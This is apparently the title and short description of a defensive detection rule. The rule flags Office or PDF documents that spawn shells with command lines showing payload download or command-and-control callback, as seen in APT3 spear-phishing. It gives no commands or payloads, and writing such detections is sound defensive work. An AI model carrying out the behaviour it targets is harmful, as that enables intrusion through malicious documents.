APT Office/PDF Document Spawning Shell with C2 Callback (APT3 / Spear-Phishing)

Detects Office or PDF documents spawning shell processes with a CommandLine indicating payload download or C2 callback, a core pattern in APT3 and advanced actor spear-phishing campaigns leveraging initial access TTPs via email